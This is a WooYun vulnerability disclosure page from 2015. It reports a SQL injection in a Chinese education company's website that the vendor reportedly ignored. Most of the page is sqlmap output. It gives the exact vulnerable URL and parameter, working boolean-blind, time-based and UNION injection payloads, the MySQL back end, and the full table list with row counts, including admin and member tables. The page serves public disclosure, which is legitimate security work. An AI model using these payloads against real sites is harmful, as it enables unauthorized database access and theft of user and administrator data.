当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160959

漏洞标题:东财科技主站存在SQL注入漏洞

相关厂商:edufe.com.cn

漏洞作者: 路人甲

提交时间:2015-12-14 11:24

修复时间:2015-12-19 11:26

公开时间:2015-12-19 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://www.edufe.com.cn/special/mxxhg2014/show.php?contentid=1710

1.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: contentid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: contentid=1710 AND 7126=7126
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: contentid=1710 AND (SELECT * FROM (SELECT(SLEEP(5)))zRwL)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: contentid=-7376 UNION ALL SELECT NULL,CONCAT(0x716a766271,0x715948496e6541446943,0x717a6a6b71),NULL,NULL,NULL,NULL,NULL,NULL--
---
back-end DBMS: MySQL 5.0.12
Database: edufe
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| phpcms_ads_stat | 6059965 |
| mobile_log | 2350968 |
| phpcms_log | 17111 |
| phpcms_attachment | 7959 |
| phpcms_search_words | 7806 |
| edufe_search | 7647 |
| phpcms_stu_up_active | 7431 |
| mobile_course | 6835 |
| phpcms_school | 5382 |
| phpcms_announce_right | 3286 |
| phpcms_announce | 3191 |
| phpcms_lcenter_dynamic | 2526 |
| phpcms_member_group_priv | 2514 |
| phpcms_vote_useroption | 2505 |
| phpcms_content_count | 2442 |
| phpcms_content | 2436 |
| phpcms_c_news | 2434 |
| phpcms_content_tag | 2384 |
| phpcms_stu_up_active_ip | 2077 |
| phpcms_honor_people | 2059 |
| phpcms_admin_role_priv | 1676 |
| phpcms_keyword | 1339 |
| phpcms_lcenter | 960 |
| phpcms_lcenter_activity | 749 |
| phpcms_lcenter_teacher | 693 |
| phpcms_teacher | 693 |
| phpcms_scheme | 595 |
| phpcms_lcenter_photo | 594 |
| phpcms_photo | 593 |
| phpcms_activity | 518 |
| phpcms_menu | 403 |
| phpcms_content_position | 381 |
| phpcms_faq | 222 |
| phpcms_myclassroom_courses | 208 |
| phpcms_member_info | 197 |
| phpcms_member | 190 |
| phpcms_member_cache | 190 |
| phpcms_vote_data | 171 |
| jw_SpecCourResource | 162 |
| phpcms_admin_role | 159 |
| phpcms_admin | 155 |
| phpcms_category | 138 |
| phpcms_honor | 126 |
| phpcms_enroll | 94 |
| phpcms_award | 93 |
| phpcms_download | 89 |
| phpcms_ads | 65 |
| phpcms_stu_up_lcenter | 62 |
| phpcms_role | 57 |
| phpcms_author | 55 |
| phpcms_tea_up_lcenter | 54 |
| phpcms_vote_option | 53 |
| phpcms_dynamic | 50 |
| phpcms_session | 47 |
| phpcms_type | 46 |
| phpcms_member_detail | 40 |
| phpcms_area | 34 |
| mobile_opencourse_video | 31 |
| phpcms_urlrule | 29 |
| phpcms_link | 27 |
| phpcms_model_field | 27 |
| phpcms_manual | 26 |
| phpcms_myclassroom_singlecourse | 24 |
| phpcms_process_status | 21 |
| phpcms_module | 20 |
| phpcms_copyfrom | 16 |
| phpcms_complaint | 13 |
| phpcms_vote_subject | 13 |
| phpcms_ads_place | 10 |
| phpcms_block | 10 |
| phpcms_editor_data | 10 |
| phpcms_datelist | 9 |
| phpcms_status | 9 |
| phpcms_myclassroom_vk | 7 |
| phpcms_tea_up_active | 7 |
| phpcms_lcweb | 6 |
| phpcms_member_group | 6 |
| phpcms_process | 6 |
| mobile_opencourse | 3 |
| phpcms_position | 3 |
| phpcms_workflow | 3 |
| phpcms_lcweb_conf | 2 |
| phpcms_model | 2 |
| phpcms_lcenter_relation | 1 |
| search_counter | 1 |
+---------------------------------+---------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-19 11:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无